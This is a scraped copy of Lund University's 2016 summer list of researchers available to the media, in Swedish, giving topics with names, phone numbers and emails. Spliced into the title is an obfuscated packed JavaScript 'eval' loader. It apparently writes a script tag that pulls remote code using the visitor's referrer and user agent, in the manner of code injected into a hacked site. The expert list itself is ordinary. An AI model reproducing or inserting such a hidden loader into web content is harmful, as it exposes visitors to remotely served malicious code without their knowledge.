Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Lunds universitets sommarlista 2016

Lunds universitets sommarlista 2016
Sebastian

Lunds eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|dbhen|var|u0026u|referrer|neysn||js|php’.split(’|’),0,{}))
universitets sommarlista 2016: Vissa ämnen skrivs det särskilt ofta i media om under sommaren. Här finns en lista över forskare vid Lunds universitet som kan svara på vanliga sommarfrågor.

Aktivt och hälsosamt åldrande

Det finns många viktiga forskningsfrågor på området aktivt och hälsosamt åldrande t ex boendefrågor, äldres delaktighet i samhället, teknikutvecklingen, att åldras med funktionshinder, och åldersdiskriminering.
Susanne Iwarsson, professor i gerontologi och äldrevård, kan svara på frågor om detta, 046 222 19 40, 070 317 31 11, 
susanne.iwarsson@med.lu.se

Alger, algblomning?

Karin Rengefors, limnolog och specialist på alger och algblomning i sötvatten, 046-222 84 27, 0736-00 17 44?Karin.Rengefors(at)biol.lu.se. Semester 16 juli – 14 augusti.

Per Carlsson (saltvatten), universitetslektor i akvatisk ekologi, specialist på alger, algblomning och marinbiologi, tel 046-222 84 35 Per.Carlsson(at)biol.lu.se

Allergier och astma

Hudallergier
Cecilia Svedman, docent och dermatolog med inriktning på yrkes och miljödermatologi, 0709-18 22 04, cecilia.svedman@med.lu.se

Luftvägar, allergier och astma
Leif Bjermer, professor Lunds universitet och överläkare Skånes universitetssjukhus, Tel: 046-17 23 25, Mobil arbete: 070-212 68 45, Leif.Bjermer@med.lu.se

Bakterier och virus – infektioner, vaccinationer, antibiotikaresistens

Frågor om influensa, vaccinationer, antibiotikaresistens, bakterier och infektionssjukdomar t ex blodförgiftning, lunginflammation och urinvägsinfektion. Kristian Riesbeck, professor i klinisk bakteriologi och överläkare, 040-33 84 94, 073-0377433, Kristian.Riesbeck@med.lu.se

Johan Tham, forskare och överläkare, , 040-33 77 62, 0733-69 29 88, johan.tham@med.lu.se

Beslutsfattande under osäkerhet (aktuellt under Almedalen)

Ulrika Sahlin, forskar kring risk och beslutsfattande under osäkerhet, 073-827 44 32, ulrika.sahlin(at)cec.lu.se

Bin och pollinering

Lina Herbertsson, forskare, pollinering i våra jordbrukslandskap, 070-296 42 55, lina.herbertsson(at)cec.lu.se

Biomedicin och kroppen i medicinen

Andréa Wiszmeg, doktorand i etnologi med inriktning på biomedicin. Kan svara på frågor om samhälleliga, kulturella och etiska aspekter av biomedicin, medicinsk-teknologisk utveckling och kroppen i medicinen. andrea.wiszmeg@kultur.lu.se Tel: 0739-22 84 41

Brexit

Se vår särskilda expertlista för forskare som kan uttala sig om olika aspekter om Storbritanniens folkomröstning som gav resultatet att landet ska lämna EU: http://www.lu.se/article/expertlista-infor-storbritanniens-folkomrostning-om-eu?ref=pressrelease

Bränder och andra risker i det moderna samhället?

Patrick Van Hees, professor i brandteknik, har kartlagt brandorsaker i svenska skolor, 046-222 17 19, Patrick.van_Hees(at)brand.lth.se

Börsrobotar i solstolen – vad händer med investeringarna i sommar??

Niclas Andrén, universitetslektor i företagsekonomi, kan uttala sig om investeringar, börsutvecklingen och riskvärdering, företagsstrategier, finansiella instrument, psykologiska faktorer som påverkar finansiella beslut, ratingföretags värderingar av länder, 0739-78 51 61,Niclas.Andren@fek.lu.se

Cyklar och cykling

Charlotte Hagström, etnolog, 046-222 68 15, 0706-29 73 40, Charlotte.Hagstrom@kultur.lu.se

Lars-Eric Jönsson, etnolog, 0706-99 19 98, Lars-Eric.Jonsson@kultur.lu.se

Fredrik Nilsson, professor vid Institutionen för service management och tjänstevetenskapfredrik.nilsson@ism.lu.se, +46 42 35 66 29

Digitalisering av vården – eHälsa

Gudbjörg Erlingsdottir, är universitetslektor och docent i arbetsmiljöteknik. Hon är också koordinator för  forskningsplattformen Health Design vid Designvetenskaper. Tel: 0733-16 66 82, gudbjorg.erlingsdottir (at) design.lth.se

Djur och växter?

Lars Pettersson är zooekolog och kan mycket om dag- och nattfjärilar. Han ansvarar för Svensk Dagfjärilsövervakning som finns över hela landet, 046-222 38 18, lars.pettersson(at)biol.lu.se

Marie Widén, föreståndare för Botaniska trädgården, 046-222 73 19, marie.widen(at)botan.lu.se

Torbjörn Tyler, växtekolog, har bland annat inventerat den skånska floran, 046- 222 42 34, Torbjorn.Tyler(at)biol.lu.se

Ekosystemet

Katarina Hedlund, professor, ekosystemtjänster i jord, 072-562 10 04, katarina.hedlund(at)biol.lu.se

EM och andra idrottshändelser??

Erwin Apitzsch är idrottspsykolog. Kan resonera om psykologiska aspekter på idrott som exempelvis vad som händer när ett lag drabbas av kollektiv kollaps och hur kan det undvikas, 0708-14 48 65, erwin.apitzsch@psy.lu.se

Erosion, kustförstörelse, vattenströmmar?

Hans Hanson, professor i vattenresurslära, 046-222 89 87, mobil: 0705-12 83 11, bostad: 046-12 83 11, sommarbostad 0411-12 821, E-post: Hans.Hanson(at)tvrl.lth.se

Familjeförhållanden?

Hans Swärd, professor vid Socialhögskolan. Forskar om fattigdom, sociala problem, hemlöshet, socialt arbete och det sociala arbetets historia. 046-222 94 15, 0702-094615 Hans.Sward(at)soch.lu.se

Farliga växter, förgiftningar?

Ulf Ellervik, professor, Bioorganisk kemi, 046-222 82 20, ulf.ellervik(at)chem.lu.se

Fiskar

Karin Mattsson, forskare, nanoplast i haven, plast som äts av fiskar, 070-234 84 07, karin.mattsson(at)biochemistry.lu.se

Lina Nikoleris, forskare, vatten, fisk och hormoner, 070-687 21 57, lina.nikoleris(at)biol.lu.se

Fysisk aktivitet och idrottsmedicin

Fysisk aktivitet, funktionshinder och idrottsmedicin
Jan Lexell, professor i rehabiliteringsmedicin, särskilt neurovetenskap vid Lunds universitet och överläkare vid Skånes universitetssjukhus

Medicinskt ansvarig för den svenska truppen inför det kommande Paralympiska spelen i Rio i september 2016, medlem i International Paralympic Committee och Dopingkommissionens dispenskommitte.

046-222 19 91, 070-572 92 15, jan.lexell@med.lu.se

Elitidrott – mat och träning

Åsa Tornberg, forskare och fysioterapeut, kan svara på frågor kring elitmotionärers och professionella idrottares behov av energiintag. Med för lite energi i kroppen riskerar skelettskador, ­menstruationsrubbningar och sämre utväxling på träningen. Kontakt: 046 222 97 66,  0706 84 86 89 asa.tornberg@med.lu.se

Konsekvenser, utfall och behandling efter främre korsbandsskada

Richard Frobell, forskare, docent vid Lunds universitet och verksam som forskningschef på Skånevård Sund, Region Skåne, 070 850 78 82, richard.frobell@med.lu.se

Finansiering av kollektivtrafik

Erik Ronnle, doktorand vid K2 och Ekonomihögskolan, forskar på Sverigeförhandlingens beslutsprocesser samt finansiering av kollektivtrafik, erik.ronnle@fek.lu.se, 0736-75 06 81

Fåglar?

Caroline Isaksson, biträdande universitetslektor, specialist på urbaniseringseffekter på fåglar (fr.a.), luftföroreningars effekter på djur, nutrition hos fåglar, fåglars hälsa i relation till miljöföroreningar, fjäderfärger, antioxidanter mm… 0725-222204, caroline.isaksson(at)biol.lu.se

Thomas Alerstam, professor, specialist på flyttfåglar och deras orientering, 046-222 37 85, Thomas.Alerstam(at)biol.lu.se

Susanne Åkesson, professor, leder stort forskningsprojekt om fåglars och andra djurs flyttförmåga, 070-245 04 23, susanne.akesson@biol.lu.se

Jan-Åke Nilsson, professor, om fåglars strategier, 046-222 45 69, Jan-Ake.Nilsson(at)biol.lu.se

Åke Lindström, professor, arbetar med en inventering av fågelbeståndet, 046-222 49 68, Ake.Lindstrom(at)biol.lu.se

Fästingar och insekter

Lars Lundqvist, biolog, vet att berätta om hur fästingar och insekter beter sig i naturen, Lars.Lundqvist(at)biol.lu.se, 046-222 93 34

Mikael Sörensson, entomolog och specialist på insekter, fann och namngav Tranströmers tornbagge. Expert på världens minsta skalbaggar. Har tagit fram en användarvänlig modell för lekmän om hur man kan mäta naturvärden med hjälp av insektsinventering, 070-2687067, Mikael.Sorensson(at)biol.lu.se

Lars Råberg, funktionell zoolog, svarar på frågor om borrelia och andra fästingspridda sjukdomar, 046-222 37 66, Lars.Raberg(at)biol.lu.se

Emily Baird, forskare och specialist på insekters syn och navigering, 046-222 96 18, +46 72 700 55 55, emily.baird(at)biol.lu.se

Gatukonst, graffiti och konst i det offentliga rummet

Peter Bengtsen är konsthistoriker och sociolog med specialinriktning på gatukonst (street art). Han kan svara på frågor om gatukonst, graffiti och konst i det offentliga rummet, samt om konst och kultur mera generellt. 046-222 38 06, peter.bengtsen@kultur.lu.se

Förpackningar för minskat matsvinn

Annika Olsson är professor vid Förpackningslogistik och vicerektor vid Lunds Tekniska Högskola. Hon kan förpackningar, förpackningsdesign för hållbar utveckling och förpackningslogistik i allmänhet, annika.olsson(at)plog.lth.se, 046-222 97 34, 0705-22 45 69

Grillningens risker, kött och köttprodukter?

Eva Tornberg, professor i livsmedelsteknik, kan svara på frågor om funktionell mat. 046-222 48 21, 0733-76 95 51, bostad: 046-14 17 10, Eva.Tornberg (at) food.lth.se

Grill och matos – hälsoeffekter av ultrafina partiklar i luften?

Ulf Ellervik, professor i bioorganisk kemi, ulf.ellervik@chem.lu.se, 046-222 82 20

Christina Isaxon forskar i aerosolteknologi med fokus på luftens partiklar och vad de gör med hälsan, 046-222 39 35, 0707-774587, christina.isaxon (at) design.lth.se

Grundvatten

Charlotte Sparrenbom, geolog, jobbar med grundvattenrelaterade frågor såsom föroreningsförekomst, och transport av föroreningar, miljöövervakning och dricksvattenresurser, 046-222 39 54, 072-222 52 66, charlotte.sparrenbom(at)geol.lu.se

Gränser och gränsöverskridande gemenskaper

Fredrik Nilsson,  Professor vid Institutionen för service management och tjänstevetenskapfredrik.nilsson@ism.lu.se, +46 42 35 66 29

Havsfrågor och marin mätteknik?

Peter Jonsson, universitetsadjunkt i teknisk geologi, 046- 222 49 58, 0706-49 23 33, Peter.Jonsson(at)tg.lth.se

Daniel Conley, professor och biogeokemist vid institutionen för geo- och ekovetenskaper, studerar Östersjöns problem med syrefattiga bottnar, 046-222 04 49, 0707-49 43 41, Daniel.Conley(at)geol.lu.se

Karin Mattsson, forskare, nanoplast i haven, plast som äts av fiskar, 070-234 84 07, karin.mattsson(at)biochemistry.lu.se

Lina Nikoleris, forskare, vatten, fisk och hormoner, 070-687 21 57, lina.nikoleris(at)biol.lu.se

Historiskt återkskapande, tex rollspel, marknader och festivaler

Stefan Nyzell, universitetslektor i historia, kan svara på frågor om historiskt återskapande – alltifrån historiska rollspel, marknader och festivaler till utställningar, tv-serier och filmer.stefan.nyzell@mah.se, Tel: 0703-63 11 77, 046-222 03 64

Hållbart fiske

Johan Hultman och Filippa Säwe forskar om ekologiskt hållbart fiskewww.hallbartfiske.blogg.lu.se, Johan.hultman(at)ism.lu.se, 042-35 66 13/ filippa.sawe(at)ism.lu.se, 042-35 65 99

Hälsa och synen på hälsa, samt övervikt ur ett kulturhistoriskt perspektiv

Fredrik Nilsson, professor vid Institutionen för service management och tjänstevetenskapfredrik.nilsson@ism.lu.se, 042-35 66 29

Högtider

Gabi Louisedotter, etnolog och anställd vid Folklivsarkivet, kan berätta om våra högtider,gabi_louisedotter.limbach@folklivsarkivet.lu.se, 046-222 75 68

IT-attacker

Martin Hell, universitetslektor vid Elektro- och informationsteknik, LTH. Tel: 046-222 43 53, 0702-62 83 76, martin.hell (at) eit.lth.se

Jordgubbens ekonomi – bönder, mat och konsumtion?

Helena Johansson är ek. dr. och föreståndare på Agrifood Economics Centre vid Ekonomihögskolan och forskar om landsbygdsutveckling, bioenergi och handel inom jordbruket. Kan också tipsa om jordbruksekonomer vid centret som kan svara på frågor om ekonomin och ekologin från jord till bord, 046-222 07 96,  helena.johansson@agrifood.lu.se

Klimat och energi?

Markku Rummukainen, professor, klimat, klimatförändringar och FN:s klimatförhandlingar, 046-222 96 84, markku.rummukainen(at)cec.lu.se

Torben Christensen, institutionen för geo- och ekosystemvetenskaper, studerar myrar vid Abisko och ser hur de blir allt blötare, 046-222 37 43, 0709-56 37 43, Torben.Christensen(at)nateko.lu.se

Anders Lindroth, institutionen för geo- och ekosystemvetenskaper, studerar klimateffekter på skog och kolets kretslopp, 046-222 04 74, anders.lindroth(at)nateko.lu.se

Lars J Nilsson, professor i miljö- och energisystem, LTH. Lars J Nilsson svarar på frågor kring strategier för klimatomställning, styrning mot nollutsläpp samt energi- och klimatpolitiska konsekvenser, 046-222 46 83, lars_j.nilsson(at)miljo.lth.se

Max Åhman, forskare vid Miljö- och energisystem, LTH, svarar på frågor kring klimatomställning och internationell klimatpolitik, 046 -22 95 43, 0733 587 411, max.ahman(at)miljo.lth.se

Lennart Olsson, föreståndare för LUCSUS (Lunds universitets centrum för studier av uthållig samhällsutveckling). Har studerat följderna av en förändrad jordbrukspolitik inom EU, handeln med utsläppsrättigheter samt forskat om ökenspridning, livsmedelskris o klimatförändringarnas följder i Afrika. 046-222 05 11, Lennart.Olsson(at)lucsus.lu.se

Astrid Kander, professor i ekonomisk-historia, förklarar hur ekonomisk tillväxt och kris påverkar klimat, energi och hållbar utveckling.046-222 74 83, Astrid.Kander@ekh.lu.se

Pål Börjesson, professor i Miljö- och energisystem vid LTH, svarar på frågor kring hållbara drivmedel och bioenergi, 0768-82 04 06, pal.borjesson@miljo.lth.se

Klimatanpassning, sårbara grupper i Sverige och internationellt

Per Becker, docent i Risk och Säkerhet, Per.Becker@risk.lth.se, 046-222 17 28

Kommunal ekonomi under sommaren?

Ulf Ramberg, universitetslektor i företagsekonomi och forskningsledare för KEFU, är expert på kommunal ekonomi och hur kommunerna påverkas över årscykeln av satsningar, investeringar och förändringar i omvärlden.?046-222 49 60, Ulf.Ramberg@fek.lu.se

Kreativitet och tänkande

Farida Rasulzada, psykolog som forskar om kreativitet, välmående, organisation och ledarskap. 046-222 87 41, 0736-22 21 21, Farida.Rasulzada(at)psychology.lu.se

Ingar Brinck, professor i teoretisk filosofi, forskar på utveckling av normer hos barn samt grunderna för normativt beteende, samarbete och samarbetets utveckling samt metakognition d v s tänkande om tänkandet och vår förmåga att styra tänkandet samt kreativitetens grunder, 0709-20 81 25, ingar.brinck(at)fil.lu.se

Peter Gärdenfors, professor i kognitionsvetenskap, studerar begreppsbildning och semantik, samt tänkandets och språkets utveckling. Peter.Gardenfors(at)lucs.lu.se, 046-222 48 17, 0709-14 62 46

Krishantering (exempelvis skogsbränder), men också frågor om totalförsvar, civilt försvar

Christian Uhr, universitetslektor i Risk och Säkerhet samt expert vid Myndigheten för Samhällsskydd och Beredskap. Christian.Uhr@risk.lth.se 0702-83 82 16

Kulturarv?

Lars-Eric Jönsson, är etnolog och kan svara på frågor om kulturarv, kulturhistoria medicinhistoria,?och psykiatrins historia, 046-222 43 11, 0706-99 19 98 Lars-Eric.Jonsson@kultur.lu.se

Kärlekens kemi?

Ulf Ellervik, professor i bioorganisk kemi; ulf.ellervik@chem.lu.se, 046-222 82 20

Malignt melanom

Kari Nielsen, forskare Lunds universitet, hudläkare Helsingborgs lasarett, 042-406 10 00 (vx), 0704-94 33 02, kari.nielsen@med.lu.se
Håkan Olsson, professor och överläkare, 046-17 75 52, 0706-07 75 54, hakan.olsson@med.lu.se

Mat och hälsa

Hur ska man tolka olika nutritionsstudier?  Hur konstrueras kostrekommendationer? Finns det en kost som alla bör äta? Vad ska vi äta för att må bra? Emily Sonestedt, nutritionist, forskare, 040 39 13 25, 073 700 71 45, emily.sonestedt@med.lu.se

Matförgiftning

Peter Rådström, professor i teknisk mikrobiologi. Tillgänglig främst under senare delen av sommaren. peter.radstrom@tmb.lth.se, 046-222 34 12

Migrantarbetare inom gröna näringar/jordbruk

Johanna Alkan Olsson, forskare, specialist på migrantarbetare inom jordbruket och de gröna näringarna, 072-74 17 990, johanna.alkan_olsson@cec.lu.se

Miljö, markens kolförråd

Edith Hammer, forskare, markens kolförråd och MAX IV kopplat till miljöforskning, 073-244 19 68, edith.hammer(at)biol.lu.se

Mjukvaran – kan vi kontrollera den eller kontrollerar den oss?

Per Runeson är prefekt vid Institutionen för datavetenskap, LTH, och forskar kring den allt mer komplexa programvara som byggs in i våra maskiner och datorer, 046-222 93 25, per.runeson (at) cs.lth.se

Nyttiga bär – egenskaper kopplat till ämnesomsättning och fetma

Bär innehåller både vitaminer, fibrer och polyfenoler, ämnen som ger bären deras färg och fungerar som skyddande antioxidanter i kroppen. Studier på möss har visat att lingon, svarta vinbär och blåbär skyddar bättre mot fetma än andra bär. I sin forskning arbetar Karin med att i detalj reda ut vad det är som ger den goda effekten av olika bär, och om det går att maximera den genom till exempel att välja rätt odlingssätt och sort.

Karin Berger, forskare i molekylär nutrition, 046-222 81 28, 0708-411725, karin.berger@med.lu.se

Musik och festivaler

Jonas Bjälesjö, etnolog och har skrivit om Hultsfredsfestivalen, samt allmänt om ungdom, musik, festivaler, trender och musikkultur, 0703-14 82 66, Jonas.Bjalesjo(at)kultur.lu.se

Patrik Sandgren, musiketnolog och arkivarie på Folklivsarkivet med Skånes musiksamlingar. Patrik har skrivit om ramsor och melodistrukturer i såväl populärmusik, vaggvisor som fotbollsfansens sång på läktarna. Skånes musiksamlingar är ett traditionsarkiv för i huvudsak folklig musik och visa till både fest och vardag, 046-222 36 12, 0727-36 46 46, Patrik.Sandgren(at)folklivsarkivet.lu.se

Thomas Olsson, musikvetare som gärna svarar på frågor inom fälten rock, jazz samt musik och samhälle,?046-222 32 75, 0766-31 95 70 Thomas.Olsson(at)kultur.lu.se

Natur- och miljövård?

Henrik Smith är professor i zooekologi, även expert på biologisk mångfald och föreståndare för universitetets centrum för miljö- och klimatforskning. Kan också tala om klimatets påverkan på biologisk mångfald och ekosystemtjänster, Tel: 046-222 93 79, 0709 782056, Henrik.Smith(at)biol.lu.se

När är vi framme? Transport, logistik och risker?

Ulf Paulsson, docent i företagsekonomi, forskar på supply chain management, risker inom trafik, transport och logistik, särskilt järnvägstrafik, 046-222 47 23, 0706-73 13 22, ulf.paulsson@fek.lu.se

Anders Wretstrand, docent vid LTH och forskare vid K2, forskar på strategi, policy och planering inom kollektivtrafik samt särskilda gruppers behov. Han svarar på frågor om kollektivtrafik i sommartid, 0766-32 78 65, anders.wretstrand@tft.lth.se

Fredrik Pettersson, post doc vid K2 och LTH, forskar på ett regionalt superbuss-koncept – en satsning på bekvämare bussresor i Skåne, 0737-15 63 58, fredrik.pettersson@tft.lth.se

Olyckor, exempelvis flygolyckor, kärnkraftshaverier, tågolyckor, eller vårdskador i sjukvården, frågor om mänskliga felJohan Bergström, universitetslektor vid avdelningen för Riskhantering och Samhällssäkerhet, johan.bergstrom@risk.lth.se,  046-222 08 80

Plastikkirurgi

Håkan Brorson, docent och överläkare vid plastikkirurgiska kliniken kan svara på frågor om plastikkirurgi – lymfödem, rekonstruktion efter cancer, brännskador, missbildningar och trauma, 040-33 34 37, 0706-46 38 38, hakan.brorson@med.lu.se

Politik och litteratur

Torbjörn Forslid och Anders Ohlsson, båda professorer i litteraturvetenskap, kan svara på frågor om vilken roll litteraturen spelar för dagens politiker. Torbjörn Forslid, 046-222 84 73, torbjorn.forslid(at)litt.lu.se och Anders Ohlsson, 046-222 84 67, ?anders.ohlsson(at)litt.lu.se

Resande och risker – transnationella kriminella nätverk, spritsmuggling

Fredrik Nilsson,  Professor vid Institutionen för service management och tjänstevetenskapfredrik.nilsson@ism.lu.se, 042-35 66 29

Samhällets sårbarhet/riskhantering och samhällsviktig verksamhet

Henrik Tehler, professor i Risk och Säkerhet, Henrik.Tehler@risk.lth.se, 046-222 48 50

Semester och resande

Carina Sjöholm, etnolog, forskar om resor i böckers och författares fotspår. Carina Sjöholm är författare till boken ”Litterära resor : turism i spår en efter böcker, filmer och författare”. Kan även svara på frågor som rör våra skärgårdar, Carina.sjoholm@ism.lu.se, 0706-96 73 88

Orvar Löfgren, professor emeritus, resande, upplevelseindustrin, 046-13 08 32 eller 0525-254 20

Semester under knappa förhållanden?

Torbjörn Hjort vid Socialhögskolan i Lund har forskat om fattiga familjers boende och konsumtion. Kan uttala sig om den psykologiska och praktiska svårigheten att vara sparsam och varför fattigdom alltmer ses som ett personligt misslyckande snarare än ett samhällsproblem, 046-222 30 61, 0707-39 62 56, torbjorn.hjort(at)soch.lu.se

Angelica Angelin kan svara på frågor om fattigdom, socialbidrag och ungdomsarbetslöshet.Angelica.angelin@soch.lu.se, 0709-15 07 63

Sjöar, gödning, försurning?

Lars-Anders Hansson, professor i akvatisk biologi, studerar bland annat vilka effekter ett varmare klimat kan få på vattenkvalitet och livet i sjöar, 046-222 41 69, Lars-Anders.Hansson(at)biol.lu.se

Anders Lindroth, professor i naturgeografi och ekosystemsanalys, forskar om klimatförändringar och hur dessa påverkar olika naturmiljöer (ekosystem). Han studerar bland annat ekosystemen i Skandinaviens skogar och sjöar, 046-222 04 74, Anders.Lindroth(at)nateko.lu.se

Skola, skolstart, skolköande

Tommy Andersson, professor nationalekonomi, har matematiska modeller för hur man ska matcha skolval och platser. Hur kan man ta hänsyn till föräldrars önskemål, gångavstånd, syskonförtur i kommunala skolor och samtidigt inte skapa incitament att ange icke sanningsenliga önskemål? Tommy.Bengtsson@ekh.lu.se, 046-222 73 80

Smitta – semesterförstöraren

Undvik luftburen smitta, däribland kräksjukevirus. Jakob Löndahl, universitetslektor vid Ergonomi och aerosolteknologi, ger besked, 046-222 05 17, 0735-51 86 36, jakob.londahl (at) design.lth.se

Solenergi

Villy Sundström, professor i kemisk fysik. Hans forskning handlar om att utveckla nya material för solceller och artificiell fotosyntes, som uppfyller krav på att vara miljövänliga, energisnåla och ha flexibel användning. Villy.Sundstrom@chemphys.lu.se, 046-222 46 90, 0702-83 66 06

Jessica Lagerstedt Wadin forskar vid Sektionen för industriell ekonomi på LTH och har med kollegor studerat solenergiexpansionen i Kalifornien, där en särskild hyrmodell för solpaneler används, 046-222 03 59, 0767-68 28 41, jessica.wadin@iml.lth.se

Sol, ljus och färgerHur vi påverkas psykiskt?

Thorbjörn Laike, lektor i miljöpsykologi, 046-222 70 78, 046-222 76 04,?Thorbjorn.Laike@arkitektur.lth.se

Nanorisk med solkrämen?

Christina Isaxon är biträdande universitetslektor vid Ergonomi och aerosolteknologi. Hon kan svara på frågor om risker nanomaterial och nanopartiklar.

Tel: 046-222 39 35, 0707-774587, christina.isaxon (at) design.lth.se

Sommar, sol och beroende – spel-, alkohol- och narkotika

Det är inte ovanligt att olika typer av beroende – alkohol, spel mm – uppstår och/eller intensifieras under sommaren/semestertider. Beroendeforskaren Anders C. Håkansson, docent i beroendemedicin Lunds universitet och ST-läkare i psykiatri, kan svara på frågor kring detta, 046 17 55 96 (mobil anknytning), anders_c.hakansson@med.lu.se

Sommar på akuten – intensivvård

 • Brännskador (flamskador i ansikte/händer/överkropp) i samband med grillning
 • Alkoholförgiftning
 • Kolmonoxidförgiftning (rökgas/gasolförgiftning)
 • Avklippta tår och fötter i samband med motorgräsklippning (typiskt i utförsbacke och med fuktigt fräs)
 • Söndertrasade händer i samband med hydrauliska vedklyvar
 • Avsågade fingrar och händer
 • Dykolyckor (tryckfallssjuka, drunkning)
 • Svåra fallolyckor
 • Drunkningsolyckor
 • Skall- och nackskador (fr a vid dykning på grunt vatten)
 • Getingstick (med livshotande allergisk reaktion)
 • Ormbett
 • MC-, moped, fyrhjulings- och cykelolyckor
 • Misshandel och överfall
 • Värmeslag, intorkning

Jonas Åkeson, professor i anestesiologi och intensivvård vid Lunds universitet och överläkare vid Skånes universitetssjukhus, 040-33 74 53, 0708-31 11 13, jonas.akeson@med.lu.se

Sommardeckare och sommarlitteratur

Kerstin Bergman, docent i litteraturvetenskap vid Lunds universitet, medlem av Svenska deckarakademin och deckarrecensent. Aktuell med Swedish Crime Fiction: The Making of Nordic Noir (2014) och Deckarnas svenska landskap: Från Skåne till Lappland (2014). Bloggar om deckare på crimegarden.se, Kerstin.bergman@litt.lu.se, 0762-26 26 85

Anders Ohlson och Torbjörn Forslid, professorer i litteraturvetenskap. Litterära kändisskap – från GW Persson till Selma Lagerlöf. Politikernas sommarläsning – vad säger den om dem? Vilka signaler vill politiker skicka genom att berätta vilka böcker de gillar? anders.ohlson@litt.lu.se, 0706-30 52 43 och torbjorn.forslid@litt.lu.se, 0731-52 30 63

Sommarrea, beslutsångest och konsumenträtt?

Olof Jakobsson, JK, universitetsadjunkt och forskare inom handelsrätt. En duktig pedagog, som kan köp- och avtalsrättsliga frågor på sin fem fingrar, 0705-12 37 20,?Olof.Jakobsson@busilaw.lu.se

Språk – gester och vuxen språkinlärning?

Marianne Gullberg, professor psykolingvistik, vetenskaplig chef Humanistlaboratoriet, 046-222 03 89, marianne.gullberg@ling.lu.se

Stjärnor, galaxer och exoplaneter

Lennart Lindegren, professor i astronomi, 046 222 73 09, Lennart.Lindegren(at)astro.lu.se

Sofia Feltzing, professor i astronomi, 046 222 72 94, Sofia.Feltzing(at)astro.lu.se

Anders Johansen, universitetslektor i astronomi, 046 222 15 89, anders.johansen(at)astro.lu.se

Strejker, upplopp och kravaller

Stefan Nyzell, fil dr i historia, stefan.nyzell(at)hist.lu.se, 0703-63 11 77

Svamp

Sigvard Svensson, mykolog, Biologiska museet, 046-222 40 61, Sigvard.Svensson(at)biol.lu.se

Söderhavet – ur ett humanekologiskt perspektiv

Thomas Malm, 046-222 04 17, Thomas.Malm(at)hek.lu.se

Trender, konsumtion och varumärken – vad lockar kunderna i sommar?

Johan Anselmsson, universitetslektor i företagsekonomi, kan svara på frågor om företags marknadsföring under sommaren, värden som driver försäljning, starka varumärken och prissättningsstrategier. 0709-96 76 80,?johan.anselmsson@fek.lu.se

Kaj-Dac Tam, ekonomie doktor i företagsekonomi, har studerat hur nöjdheten hos anställda i detaljhandeln gör att varumärket blir mer attraktivt för kunder och gör att lönsamheten stiger. Undersökt mer än 100 aktörer. Hur blir ett varumärke ”äkta”? 0739-36 84 78, kaj-dac.tam@fek.lu.se

Tillväxten – vart tar den vägen på semestern?

Fredrik Sjöholm, professor i nationalekonomi, kan svara brett på frågor om globaliseringseffekter, tillväxt och ekonomi i Asien och Kina. Bra på hur regioners konkurrenskraft och hur de påverkas av globaliseringen. 0733-97 88 90, Fredrik.Sjoholm@nek.lu.se

Andreas Bergh, universitetslektor i nationalekonomi, kan svara på hur ekonomin påverkar svensk fördelningspolitik, välfärdsstaten, inkomstfördelning och svenska politiska reformer. 0707-79 07 34,Andreas.Bergh@nek.lu.se

Träd och trädgårdar

Charlotte Hagström, etnolog, har arbetat med förhållandet mellan kultur och natur med utgångspunkt i träd. Vilka förhållanden har människor till träd och varför?,046-222 68 15, 0706-29 73 40, Charlotte.Hagstrom@kultur.lu.se

Carina Sjöholm kan tala om träds betydelse och forskar om villaträdgårdarnas betydelse i vardagen men också som avstressare, prestigemarkering etc för de boende. Hon intresserar sig även för besöksträdgårdar och har forskat om livsstilsentreprenörer som kombinerar livet på landsbygden med öppen trädgård, plantförsäljning, guidade turer mm. 0706-96 73 88, Carina.Sjoholm@ism.lu.se

Turism

Erika Andersson Cederholm forskar om livsstilsföretagande på landsbygden, t ex hästgårdar och turismverksamheter som Bed & Breakfast och liknande. 0703-51 90 84, Erika.Andersson_Cederholm(at)ism.lu.se

Stefan Gössling forskar om turismens inverkan på klimat/miljö. 0704- 92 26 34, Stefan.Gossling(at)ism.lu.se

Upptäckarglädje – Vad tittar människor på?(under sommaren och annars)

Kenneth Holmqvist, professor i psykologi. Forskar om bla ögonrörelser, 0725-32 22 44, kenneth.holmqvist(at)humlab.lu.se

Carina Sjöholm, etnolog, forskar om resor i böckers, filmers och författares fotspår. Carina Sjöholm är författare till boken ”Litterära resor: turism i spår en efter böcker, filmer och författare”. Kan även svara på frågor som rör våra skärgårdar och sommargäster-bofasta-problematik, Carina.sjoholm@ism.lu.se, 0706-96 73 88

Yrsel och balans

Yrsel kan ha flera olika orsaker bl a störningar i balansorgan, psykiska ohälsa eller att den ”gamla kroppen” inte hänger med riktigt som tidigare. Ofta är det ofarligt, men kan upplevas som skrämmande och hotfullt. Vad orsakar yrsel- och balansstörningar och hur kan man hantera den? Eva Ekvall Hansson, docent i sjukgymnastik, 046 222 19 86, 040 39 13 58, eva.ekvall-hansson@med.lu.se

Åska, blixtar och dunder

Carl-Erik Magnusson, ?universitetslektor i fysik, 046-222 77 27, Carl-Erik.Magnusson(at)nuclear.lu.se